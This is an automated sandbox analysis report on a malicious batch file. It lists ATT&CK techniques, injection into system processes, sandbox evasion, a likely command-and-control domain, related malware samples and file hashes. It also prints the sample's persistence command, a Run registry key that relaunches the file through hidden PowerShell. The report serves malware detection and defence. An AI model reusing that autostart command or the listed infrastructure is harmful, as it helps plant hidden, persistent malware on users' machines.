Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts141
Windows Management Instrumentation		1
Scripting		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		1
Credential API Hooking		1
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Native API		1
DLL Side-Loading		1
Access Token Manipulation		1
Obfuscated Files or Information		11
Input Capture		2
File and Directory Discovery		Remote Desktop Protocol1
Credential API Hooking		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts22
Command and Scripting Interpreter		11
Scheduled Task/Job		813
Process Injection		1
Software Packing		Security Account Manager143
System Information Discovery		SMB/Windows Admin Shares11
Input Capture		1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts11
Scheduled Task/Job		31
Registry Run Keys / Startup Folder		11
Scheduled Task/Job		1
DLL Side-Loading		NTDS481
Security Software Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts1
PowerShell		Network Logon Script31
Registry Run Keys / Startup Folder		1
File Deletion		LSA Secrets2
Process Discovery		SSHKeylogging13
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
Rootkit		Cached Domain Credentials261
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Masquerading		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry		Proc Filesystem1
System Network Configuration Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt261
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Access Token Manipulation		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd813
Process Injection		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task2
Hidden Files and Directories		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524982 Sample: rbx-CO2.bat Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 85 azure-winsecure.com 2->85 87 ipwho.is 2->87 101 Suricata IDS alerts for network traffic 2->101 103 Malicious sample detected (through community Yara rule) 2->103 105 .NET source code references suspicious native API functions 2->105 107 15 other signatures 2->107 13 cmd.exe 1 2->13         started        16 powershell.exe 2->16         started        signatures3 process4 signatures5 137 Suspicious powershell command line found 13->137 139 Suspicious command line found 13->139 18 powershell.exe 33 13->18         started        22 WMIC.exe 1 13->22         started        24 WMIC.exe 1 13->24         started        30 4 other processes 13->30 141 Writes to foreign memory regions 16->141 143 Modifies the context of a thread in another process (thread injection) 16->143 145 Injects a PE file into a foreign processes 16->145 26 dllhost.exe 16->26         started        28 conhost.exe 16->28         started        process6 file7 81 C:\Windows\...\$rbx-CO2.bat:Zone.Identifier, ASCII 18->81 dropped 83 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, ASCII 18->83 dropped 109 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->109 111 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->111 113 Uses schtasks.exe or at.exe to add and modify task schedules 18->113 121 4 other signatures 18->121 32 cmd.exe 1 18->32         started        35 WerFault.exe 23 16 18->35         started        115 Injects code into the Windows Explorer (explorer.exe) 26->115 117 Contains functionality to inject code into remote processes 26->117 119 Writes to foreign memory regions 26->119 123 3 other signatures 26->123 37 lsass.exe 26->37 injected 39 winlogon.exe 26->39 injected 41 svchost.exe 26->41 injected 43 19 other processes 26->43 signatures8 process9 signatures10 93 Suspicious powershell command line found 32->93 45 powershell.exe 32->45         started        47 conhost.exe 32->47         started        49 cmd.exe 1 32->49         started        95 Writes to foreign memory regions 37->95 process11 process12 51 cmd.exe 1 45->51         started        signatures13 125 Suspicious powershell command line found 51->125 127 Suspicious command line found 51->127 54 powershell.exe 51->54         started        58 WMIC.exe 1 51->58         started        60 conhost.exe 51->60         started        62 4 other processes 51->62 process14 dnsIp15 89 azure-winsecure.com 154.216.20.132, 59172, 6969 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 54->89 91 ipwho.is 147.135.36.89, 443, 59173 OVHFR United States 54->91 129 Creates autostart registry keys with suspicious values (likely registry only malware) 54->129 131 Creates autostart registry keys with suspicious names 54->131 133 Creates an autostart registry key pointing to binary in C:\Windows 54->133 135 6 other signatures 54->135 64 powershell.exe 54->64         started        67 schtasks.exe 54->67         started        69 WerFault.exe 54->69         started        71 WerFault.exe 54->71         started        signatures16 process17 signatures18 97 Injects a PE file into a foreign processes 64->97 73 conhost.exe 64->73         started        75 powershell.exe 64->75         started        77 powershell.exe 64->77         started        99 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 67->99 79 conhost.exe 67->79         started        process19

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
rbx-CO2.bat0%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://upx.sf.net0%URL Reputationsafe
https://aka.ms/pscore60%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ipwho.is
147.135.36.89
truefalse
    		unknown
    azure-winsecure.com
    		154.216.20.132
    		truetrue
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://ipwho.is/false
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.2649694624.000001D4A93CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4C31000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
            		unknown
            http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                https://go.micropowershell.exe, 00000024.00000002.2775061134.000001B4A5B64000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.microsoft.co.1mmipowershell.exe, 00000019.00000002.3432949177.0000021404730000.00000004.00000001.00020000.00000000.sdmpfalse
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://upx.sf.netAmcache.hve.11.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/pscore6powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, Null.25.dr, Null.8.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000028.00000000.2769294113.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3406704355.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                      		unknown
                      http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                        		unknown
                        http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.2649694624.000001D4A93CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://aka.ms/pscore6xGpowershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmpfalse
                          		unknown
                          http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                            		unknown
                            http://Passport.NET/tbMicrosoft-Windows-LiveId%4Operational.evtx.49.drfalse
                              		unknown
                              https://aka.ms/pscore68powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2775061134.000001B4A4A21000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000028.00000000.2769294113.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3406704355.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpfalse
                                		unknown
                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2775061134.000001B4A4A21000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                147.135.36.89
                                		ipwho.isUnited States
                                		16276OVHFRfalse
                                154.216.20.132
                                		azure-winsecure.comSeychelles
                                		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1524982
                                Start date and time:2024-10-03 14:52:51 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 11m 26s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:41
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:20
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:rbx-CO2.bat
                                Detection:MAL
                                Classification:mal100.spyw.evad.winBAT@56/86@2/2
                                EGA Information:
                                • Successful, ratio: 85.7%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 54
                                • Number of non-executed functions: 301
                                Cookbook Comments:
                                • Found application associated with file extension: .bat

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 52.168.117.172, 20.189.173.21, 20.42.65.92
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus07.eastus.cloudapp.azure.com, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 4044 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtFsControlFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • VT rate limit hit for: rbx-CO2.bat

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                08:53:42API Interceptor4x Sleep call for process: WMIC.exe modified
                                08:53:48API Interceptor55783x Sleep call for process: powershell.exe modified
                                08:53:56API Interceptor2x Sleep call for process: WerFault.exe modified
                                08:55:18API Interceptor562x Sleep call for process: winlogon.exe modified
                                08:55:19API Interceptor508x Sleep call for process: lsass.exe modified
                                08:55:19API Interceptor4715x Sleep call for process: svchost.exe modified
                                08:55:20API Interceptor452x Sleep call for process: dwm.exe modified
                                08:55:28API Interceptor206x Sleep call for process: cmd.exe modified
                                08:55:28API Interceptor206x Sleep call for process: conhost.exe modified
                                08:55:33API Interceptor129x Sleep call for process: dllhost.exe modified
                                14:54:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                14:55:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                147.135.36.89XS3sNotzzw.exeGet hashmaliciousUnknownBrowse
                                • /?output=json
                                XS3sNotzzw.exeGet hashmaliciousUnknownBrowse
                                • /?output=json
                                154.216.20.132SC.cmdGet hashmaliciousUnknownBrowse
                                  1.cmdGet hashmaliciousUnknownBrowse
                                    2.cmdGet hashmaliciousUnknownBrowse
                                      download_2.exeGet hashmaliciousQuasarBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        azure-winsecure.comSC.cmdGet hashmaliciousUnknownBrowse
                                        • 154.216.20.132
                                        1.cmdGet hashmaliciousUnknownBrowse
                                        • 154.216.20.132
                                        2.cmdGet hashmaliciousUnknownBrowse
                                        • 154.216.20.132
                                        download_2.exeGet hashmaliciousQuasarBrowse
                                        • 154.216.20.132
                                        ipwho.isSC.cmdGet hashmaliciousUnknownBrowse
                                        • 195.201.57.90
                                        1.cmdGet hashmaliciousUnknownBrowse
                                        • 108.181.98.179
                                        2.cmdGet hashmaliciousUnknownBrowse
                                        • 195.201.57.90
                                        download_2.exeGet hashmaliciousQuasarBrowse
                                        • 147.135.36.89
                                        MZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                        • 195.201.57.90
                                        N5mRSBWm8P.exeGet hashmaliciousQuasarBrowse
                                        • 195.201.57.90
                                        Pedido09669281099195.com.exeGet hashmaliciousDarkTortilla, QuasarBrowse
                                        • 195.201.57.90
                                        mtgjyX9gHF.exeGet hashmaliciousQuasarBrowse
                                        • 108.181.98.179
                                        SecuriteInfo.com.BackDoor.QuasarNET.3.14065.23993.exeGet hashmaliciousQuasarBrowse
                                        • 195.201.57.90
                                        http://ufvskbzrquea.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                        • 195.201.57.90

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        OVHFRdownload_2.exeGet hashmaliciousQuasarBrowse
                                        • 147.135.36.89
                                        N5mRSBWm8P.exeGet hashmaliciousQuasarBrowse
                                        • 51.79.73.224
                                        xw5bGXSmtz.exeGet hashmaliciousRedLineBrowse
                                        • 164.132.72.186
                                        xw5bGXSmtz.exeGet hashmaliciousRedLineBrowse
                                        • 164.132.72.186
                                        zd4TQmKNAd.exeGet hashmaliciousRedLineBrowse
                                        • 54.38.123.247
                                        novo.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 151.80.39.149
                                        novo.x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 137.74.25.241
                                        https://546546546.pages.dev/qweqr?msharing=service@jpplus.comGet hashmaliciousHTMLPhisherBrowse
                                        • 51.83.2.241
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • 94.23.66.84
                                        PO#001498.exeGet hashmaliciousFormBookBrowse
                                        • 5.39.10.93
                                        SKHT-ASShenzhenKatherineHengTechnologyInformationCoSC.cmdGet hashmaliciousUnknownBrowse
                                        • 154.216.20.132
                                        RICHIESTA_OFFERTA_RDO2400423.docx.docGet hashmaliciousGuLoaderBrowse
                                        • 154.216.20.22
                                        1.cmdGet hashmaliciousUnknownBrowse
                                        • 154.216.20.132
                                        2.cmdGet hashmaliciousUnknownBrowse
                                        • 154.216.20.132
                                        download_2.exeGet hashmaliciousQuasarBrowse
                                        • 154.216.20.132
                                        New order02102024.docGet hashmaliciousNanocoreBrowse
                                        • 154.216.20.22
                                        KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 154.216.20.22
                                        https://akbb.kampanyakrediiislemleri.com/Get hashmaliciousUnknownBrowse
                                        • 154.216.20.140
                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                        • 156.254.70.160
                                        ppc.elfGet hashmaliciousMiraiBrowse
                                        • 156.254.70.191

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0eSC.cmdGet hashmaliciousUnknownBrowse
                                        • 147.135.36.89
                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                        • 147.135.36.89
                                        QUOTATIONS#08670.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                        • 147.135.36.89
                                        1.cmdGet hashmaliciousUnknownBrowse
                                        • 147.135.36.89
                                        2.cmdGet hashmaliciousUnknownBrowse
                                        • 147.135.36.89
                                        download_2.exeGet hashmaliciousQuasarBrowse
                                        • 147.135.36.89
                                        PVUfopbGfc.exeGet hashmaliciousLummaCBrowse
                                        • 147.135.36.89
                                        gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                        • 147.135.36.89
                                        dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                        • 147.135.36.89
                                        tYeFOUhVLd.exeGet hashmaliciousRedLineBrowse
                                        • 147.135.36.89

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_4cf4c2d6-d7db-41d7-b536-9cba589ca4c0\Report.wer

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.5090652663154955
                                        Encrypted:false
                                        SSDEEP:192:2RPGmGly9d0eLDkja1TyDdhl4Glg6zuiFqZ24lO8n8:kJGlykeLDkjOTwj4kg6zuiFqY4lO8n8
                                        MD5:6191AD8638ABA3710C3DE1261E3E46BD
                                        SHA1:DEE1AEF616E93127DB2E2F434E2FFE59945DD177
                                        SHA-256:FC5AE0D171D7938C8F2B58223B81DA277361A91759EF3FCE3AC836A84366ED53
                                        SHA-512:5752F4A5E7D6F96BA60FE46628D092659D27C9A4F08FED8247C363995424EE665F6B0BB4AFE04956AFC25B4EA081FB809A294CB1CE7804DFD1B4182ED63E8257
                                        Malicious:false
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.3.6.7.4.4.7.7.3.6.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.3.6.7.5.3.9.9.2.4.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.f.4.c.2.d.6.-.d.7.d.b.-.4.1.d.7.-.b.5.3.6.-.9.c.b.a.5.8.9.c.a.4.c.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.8.4.d.9.6.9.-.3.6.4.1.-.4.6.4.b.-.a.d.b.d.-.c.a.a.d.9.5.3.7.1.4.6.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.5.-.f.9.2.4.-.1.6.6.2.9.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_d149bb2c-3b32-4e65-aa92-fe12568dbb41\Report.wer

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.509199399227813
                                        Encrypted:false
                                        SSDEEP:192:6kmEmG6My9d0eLDkja1S1ufoJl5lg6zuiFFZ24lO8n:NmDGRykeLDkjOO+orLg6zuiFFY4lO8n
                                        MD5:537E6D1007A60C28FEC695BEC3D4976F
                                        SHA1:B344E62934395A039C2A9346C5ADD72CCEBDF081
                                        SHA-256:DEAB50A5D2700BA002BE5026539740A3E108A659F792F7C19A16D0C8C7510005
                                        SHA-512:77F4095F21BFA9880764FE4EC57A7FA7AF6D50A80F3F5BA9DAF4A640AAB32D2133C6F8B3B2034F64FAD473FA9F3981C6549678636A4CBABFE2161B73AC89D979
                                        Malicious:false
